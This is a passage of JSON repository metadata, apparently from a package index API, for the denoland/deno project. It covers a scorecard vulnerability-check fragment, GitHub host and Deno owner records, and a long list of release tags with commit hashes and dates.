GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36685524,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-15T02:00:05.847Z","response_time":94,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T